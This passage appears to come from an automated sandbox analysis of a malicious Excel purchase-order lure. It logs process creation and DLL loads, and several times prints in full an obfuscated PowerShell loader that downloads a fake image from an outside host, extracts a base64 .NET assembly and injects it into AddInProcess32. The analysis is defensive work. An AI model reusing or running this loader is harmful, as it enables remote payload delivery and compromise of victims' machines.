[Sy'+'stem.Convert]:'+':FromBase64String(t0vbase64Command); t0vloadedAssembly = [System.Reflection.Assembly]::Load(t0vcommandBytes); t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+' [ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , AmadesativadoAma , AmadesativadoAma,AmaAddInProcess32Ama,AmadesativadoAma)) } }').RepLAce('t0v','$').RepLAce(([ChaR]65+[ChaR]109+[ChaR]97),[STrINg][ChaR]39) )"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\portugalslovenia.js" Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235Ama; t0vwebClient = New-Object System.Net.WebClient; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch'+' { Write-Host AmaFailed To do'+'wnload data from t0vlin'+'kAma -ForegroundColor Red'+'; exit }; if ('+'t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UT'+'F8.GetString(t0vdownloadedData); t0vstartFlag = Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END>>Ama; t0vstartIndex = t0vimageText.IndexOf(t0vstartFlag); t0vendIndex = t0vimageText.IndexOf(t0vendFlag); if (t0vstartIndex -ge 0 -and t0vendIndex -gt t0vstart'+'Index) { t0vstartIndex += t0vstartF'+'lag.Length; t0vbase64Len'+'gth = t0vendIndex - t0vstartIndex; t0vba'+'se64Command = t0vimageText.Substring(t0vstartIndex, t0vb'+'ase64Length); t0vcommandBytes = [System.Convert]::FromBase64String(t0vbase64C'+'ommand); t0vloadedAssembly = [System.Reflection.As'+'sembly]::Load(t0vcommandBytes); t0vtype = t'+'0vloadedAssembly.GetType('+'AmaRunPE.HomeAma); t0vmethod = t0vtype.GetMethod(AmaVAIAma).Invoke(t'+'0vnull, [object[]] (Amatxt.esablanoitidarTruo/651'+'.342.3.291//:ptthAma , '+'AmadesativadoAma , AmadesativadoAma'+' , Amade'+'sativadoAma,AmaAddInPro'+'cess32Ama,AmaAma)) } }Set Scriptblock t0vlink = Amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612Am'+'a; t0vwebClient = New-O'+'bject System.Net.WebClien'+'t; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch { Write-Host AmaFailed To download data from t0vlinkAma -ForegroundColor Red; exit }; if (t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UTF8.'+'GetString(t0vdownloadedData); t0vstartFlag '+'= Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END'+'>>Ama; t0vstartIndex = t'+'0vi'+'mageText.IndexOf(t0vstartFlag'+'); t0vendIndex = t0vimageText.Index'+'Of(t0vendFlag); if (t0vstartIndex '+'-g'+'e 0 -and t0vendIndex -gt t0vstartIndex) { '+'t0vstartIndex += t0vstartFlag.Length; t0vbase64L'+'ength = t0vendIndex - t0vstartIndex; t0vbase64Command'+' = t0vimageText.Substring(t0vstartIndex, t0vbase64Length); t0vcommandB'+'ytes = [Sy'+'stem.Convert]:'+':FromBase64String(t0vbase64Command); t0vloadedAssembly = [System.Reflection.Assembly]::Load(t0vcommandBytes); t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+' [ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , AmadesativadoAma , AmadesativadoAma,AmaAddInProcess32Ama,AmadesativadoAma)) } }').RepLAce('t0v','$').RepLAce(([ChaR]65+[ChaR]109+[ChaR]97),[STrINg][ChaR]39) )"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn2.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntdsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn2.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntdsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: RunPE.pdb source: powershell.exe, 00000006.00000002.478276037.0000000000270000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.482820667.00000000062C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.479060921.00000000025B5000.00000004.00000800.00020000.00000000.sdmp
                  Source: orden de compra.xlam.xlsxInitial sample: OLE indicators vbamacros = False

                  Data Obfuscation

                  barindex
                  Source: 6.2.powershell.exe.63545dc.3.raw.unpack, RunPEE.cs.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
                  Source: 6.2.powershell.exe.270000.0.raw.unpack, RunPEE.cs.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235Ama; t0vwebClient = New-Object System.Net.WebClient; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch'+' { Write-Host AmaFailed To do'+'wnload data from t0vlin'+'kAma -ForegroundColor Red'+'; exit }; if ('+'t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UT'+'F8.GetString(t0vdownloadedData); t0vstartFlag = Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END>>Ama; t0vstartIndex = t0vimageText.IndexOf(t0vstartFlag); t0vendIndex = t0vimageText.IndexOf(t0vendFlag); if (t0vstartIndex -ge 0 -and t0vendIndex -gt t0vstart'+'Index) { t0vstartIndex += t0vstartF'+'lag.Length; t0vbase64Len'+'gth = t0vendIndex - t0vstartIndex; t0vba'+'se64Command = t0vimageText.Substring(t0vstartIndex, t0vb'+'ase64Length); t0vcommandBytes = [System.Convert]::FromBase64String(t0vbase64C'+'ommand); t0vloadedAssembly = [System.Reflection.As'+'sembly]::Load(t0vcommandBytes); t0vtype = t'+'0vloadedAssembly.GetType('+'AmaRunPE.HomeAma); t0vmethod = t0vtype.GetMethod(AmaVAIAma).Invoke(t'+'0vnull, [object[]] (Amatxt.esablanoitidarTruo/651'+'.342.3.291//:ptthAma , '+'AmadesativadoAma , AmadesativadoAma'+' , Amade'+'sativadoAma,AmaAddInPro'+'cess32Ama,AmaAma)) } }Set Scriptblock t0vlink = Amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612Am'+'a; t0vwebClient = New-O'+'bject System.Net.WebClien'+'t; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch { Write-Host AmaFailed To download data from t0vlinkAma -ForegroundColor Red; exit }; if (t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UTF8.'+'GetString(t0vdownloadedData); t0vstartFlag '+'= Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END'+'>>Ama; t0vstartIndex = t'+'0vi'+'mageText.IndexOf(t0vstartFlag'+'); t0vendIndex = t0vimageText.Index'+'Of(t0vendFlag); if (t0vstartIndex '+'-g'+'e 0 -and t0vendIndex -gt t0vstartIndex) { '+'t0vstartIndex += t0vstartFlag.Length; t0vbase64L'+'ength = t0vendIndex - t0vstartIndex; t0vbase64Command'+' = t0vimageText.Substring(t0vstartIndex, t0vbase64Length); t0vcommandB'+'ytes = [Sy'+'stem.Convert]:'+':FromBase64String(t0vbase64Command); t0vloadedAssembly = [System.Reflection.Assembly]::Load(t0vcommandBytes); t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+' [ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , AmadesativadoAma , AmadesativadoAma,AmaAddInProcess32Ama,AmadesativadoAma)) } }').RepLAce('t0v','$').RepLAce(([ChaR]65+[ChaR]109+[ChaR]97),[STrINg][ChaR]39) )"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235Ama; t0vwebClient = New-Object System.Net.WebClient; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch'+' { Write-Host AmaFailed To do'+'wnload data from t0vlin'+'kAma -ForegroundColor Red'+'; exit }; if ('+'t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UT'+'F8.GetString(t0vdownloadedData); t0vstartFlag = Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END>>Ama; t0vstartIndex = t0vimageText.IndexOf(t0vstartFlag); t0vendIndex = t0vimageText.IndexOf(t0vendFlag); if (t0vstartIndex -ge 0 -and t0vendIndex -gt t0vstart'+'Index) { t0vstartIndex += t0vstartF'+'lag.Length; t0vbase64Len'+'gth = t0vendIndex - t0vstartIndex; t0vba'+'se64Command = t0vimageText.Substring(t0vstartIndex, t0vb'+'ase64Length); t0vcommandBytes = [System.Convert]::FromBase64String(t0vbase64C'+'ommand); t0vloadedAssembly = [System.Reflection.As'+'sembly]::Load(t0vcommandBytes); t0vtype = t'+'0vloadedAssembly.GetType('+'AmaRunPE.HomeAma); t0vmethod = t0vtype.GetMethod(AmaVAIAma).Invoke(t'+'0vnull, [object[]] (Amatxt.esablanoitidarTruo/651'+'.342.3.291//:ptthAma , '+'AmadesativadoAma , AmadesativadoAma'+' , Amade'+'sativadoAma,AmaAddInPro'+'cess32Ama,AmaAma)) } }Set Scriptblock t0vlink = Amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612Am'+'a; t0vwebClient = New-O'+'bject System.Net.WebClien'+'t; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch { Write-Host AmaFailed To download data from t0vlinkAma -ForegroundColor Red; exit }; if (t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UTF8.'+'GetString(t0vdownloadedData); t0vstartFlag '+'= Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END'+'>>Ama; t0vstartIndex = t'+'0vi'+'mageText.IndexOf(t0vstartFlag'+'); t0vendIndex = t0vimageText.Index'+'Of(t0vendFlag); if (t0vstartIndex '+'-g'+'e 0 -and t0vendIndex -gt t0vstartIndex) { '+'t0vstartIndex += t0vstartFlag.Length; t0vbase64L'+'ength = t0vendIndex - t0vstartIndex; t0vbase64Command'+' = t0vimageText.Substring(t0vstartIndex, t0vbase64Length); t0vcommandB'+'ytes = [Sy'+'stem.Convert]:'+':FromBase64String(t0vbase64Command); t0vloadedAssembly = [System.Reflection.Assembly]::Load(t0vcommandBytes); t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+' [ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , AmadesativadoAma , AmadesativadoAma,AmaAddInProcess32Ama,AmadesativadoAma)) } }').RepLAce('t0v','$').RepLAce(([ChaR]65+[ChaR]109+[ChaR]97),[STrINg][ChaR]39) )"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235Ama; t0vwebClient = New-Object System.Net.WebClient; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch'+' { Write-Host AmaFailed To do'+'wnload data from t0vlin'+'kAma -ForegroundColor Red'+'; exit }; if ('+'t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UT'+'F8.GetString(t0vdownloadedData); t0vstartFlag = Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END>>Ama; t0vstartIndex = t0vimageText.IndexOf(t0vstartFlag); t0vendIndex = t0vimageText.IndexOf(t0vendFlag); if (t0vstartIndex -ge 0 -and t0vendIndex -gt t0vstart'+'Index) { t0vstartIndex += t0vstartF'+'lag.Length; t0vbase64Len'+'gth = t0vendIndex - t0vstartIndex; t0vba'+'se64Command = t0vimageText.Substring(t0vstartIndex, t0vb'+'ase64Length); t0vcommandBytes = [System.Convert]::FromBase64String(t0vbase64C'+'ommand); t0vloadedAssembly = [System.Reflection.As'+'sembly]::Load(t0vcommandBytes); t0vtype = t'+'0vloadedAssembly.GetType('+'AmaRunPE.HomeAma); t0vmethod = t0vtype.GetMethod(AmaVAIAma).Invoke(t'+'0vnull, [object[]] (Amatxt.esablanoitidarTruo/651'+'.342.3.291//:ptthAma , '+'AmadesativadoAma , AmadesativadoAma'+' , Amade'+'sativadoAma,AmaAddInPro'+'cess32Ama,AmaAma)) } }Set Scriptblock t0vlink = Amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612Am'+'a; t0vwebClient = New-O'+'bject System.Net.WebClien'+'t; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch { Write-Host AmaFailed To download data from t0vlinkAma -ForegroundColor Red; exit }; if (t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UTF8.'+'GetString(t0vdownloadedData); t0vstartFlag '+'= Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END'+'>>Ama; t0vstartIndex = 